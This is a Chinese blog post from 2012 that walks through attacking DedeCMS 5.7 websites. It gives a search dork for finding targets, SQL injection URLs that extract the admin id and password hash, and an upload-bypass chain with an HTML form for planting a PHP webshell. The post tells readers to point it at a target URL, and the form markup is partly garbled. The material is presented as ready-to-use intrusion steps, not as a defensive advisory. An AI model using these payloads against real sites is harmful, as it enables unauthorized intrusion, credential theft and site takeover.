注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

情节☆碎片(R.e.x)

离开你 在不用脚落地似舞蝶舞便天地谁的美美的日月嫉妒叫我忘记醉生梦死!

 
 
 

日志

 
 
关于我

我表情里带着对现实的沮丧,眼神里流露出对生活的渴望,愿你真正的理解我,愿你真正的体到. —————— ☆☆☆☆ 2011年8月20日开始加入网络技术与网络营销等等的帖子与文章 请关注 ☆☆☆☆ ☆☆☆☆· -————--- 部分文章为原创转载请联系作者注明!! ☆☆☆☆ ☆☆☆☆ 希望交到更多朋友,志同道合的人,交流爱好以及技术等。

网易考拉推荐

Dedecms5.7注入上传漏洞  

2012-12-06 14:48:26|  分类: 网络(各种知识) |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。

  注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,

  然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。

Dedecms5.7注入上传漏洞 - 情节☆碎片 - 情节☆碎片(R.e.x)

 

然后写上语句/member /ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'` 查看管理员id

  /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'` 查看管理员密码

  得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

 

  上传漏洞。要求网站开启新会员注册功能,首先注册新会员,无需通过邮件验证,

  只要登陆会员中心,然后访问页面链接

  “/plus/carbuyaction.php?dopost=memclickout&oid =S-P0RN8888&rs[code]=../dialog/select_soft_post”

  如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

 

Dedecms5.7注入上传漏洞 - 情节☆碎片 - 情节☆碎片(R.e.x)

 

 于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

<form action="=../dialog/select_soft_post]

<[/url">http://www.si1ence.cn/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>

 

 把url改成目标url就行了。还有个全局变量提交,绕过注册的可以去黑防2月刊上面看

  评论这张
 
阅读(2039)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017